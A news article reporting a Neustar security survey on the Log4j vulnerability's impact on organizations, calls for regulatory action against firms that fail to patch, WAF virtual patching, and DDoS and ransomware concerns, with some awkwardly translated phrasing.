Security officials want legal action for not fixing Log4j

The recently identified vulnerability in the Java Log4j logging package has created headaches for security professionals around the world. 61% of organizations responding to the latest Neustar International Security Council (NISC) survey, conducted in January 2022, said they had launched attacks targeting this vulnerability. An even larger share (75%) said they had been impacted by Log4j, with one in five (21%) saying the impact had been significant.

Log4j vulnerability reduced security professionals’ trust in open source tools

The most common impact of Log4j was the need for IT and security teams to work over the holidays to assess risk and make critical changes to protect infrastructure and data (52%), followed by reassessment software supply chain security practices (45%) and software purchasing decisions (44%). A significant share of respondents also decided to reassess existing vendor relationships (35%) or said the vulnerability reduced their trust in open source tools (34%).

87% of respondents said that given the level of cyber risk posed by Log4j, government regulatory agencies (such as the US Federal Trade Commission) should take legal action against organizations that fail to patch not the fault. In the words of one security professional, these organizations “may fail to secure and protect important customer data.” Another agreed: “It puts everyone at risk. We should have control over where our customers’ data ends up. Another responded that companies big enough to fix the problem should do so and that the federal government should enforce this mitigation because “if they don’t, who will? »

“News of the Log4j threat has sent security and application teams around the world into a frenzy of activity – taking inventory of their internet-connected systems, checking Log4j, checking revision levels and putting patches in place. emergency – and while many organizations have taken the appropriate proactive step to reach out to business partners and suppliers to assess potential exposure, timing has made it possible to address this much more difficult challenge,” said Carlos Morales, Senior Vice President of Solutions at Neustar Security Services.

Virtual patching to manage zero-day threats

For companies that have deployed Web Application Firewall (WAF) technology or outsource WAF functions to their cloud security providers, there may be a simple solution to manage zero-day threats like Log4j: the virtual patch.

“Virtual patches can trick any potential attacker into thinking that your apps aren’t vulnerable to a threat,” Morales added. “WAF solutions are deployed inline with web application traffic and act as reverse proxies between application clients and origin servers. The WAF terminates the connection with the client, ensures that the client does not perform any malicious actions, and then creates a separate connection with the server, bridging the data between the two. Since it terminates client traffic, the WAF can act on behalf of the origin server and cover any vulnerabilities that exist on the server. Virtual patching is one way to achieve this.

In addition to Log4j, surveyed security professionals were asked about their other top concerns during the November and December 2021 reporting period. Distributed denial of service (DDoS) was ranked as the top concern by 21 % of respondents, followed by ransomware. and system compromise (both 18%).

Ransomware, DDoS attacks and targeted hacking are the threats most likely to be seen to have increased over the reporting period. The threats that organizations focused their ability to respond to the most during this period were vendor or customer impersonation, targeted hacking, and ransomware.

Digging deeper into the top concern of survey participants – DDoS attacks – it was revealed that 84% of businesses had experienced a DDoS attack at some point. 57% of organizations surveyed said they outsource their DDoS attack mitigation, and 60% said it typically takes between 60 seconds and 5 minutes to initiate mitigation.

Comments are closed.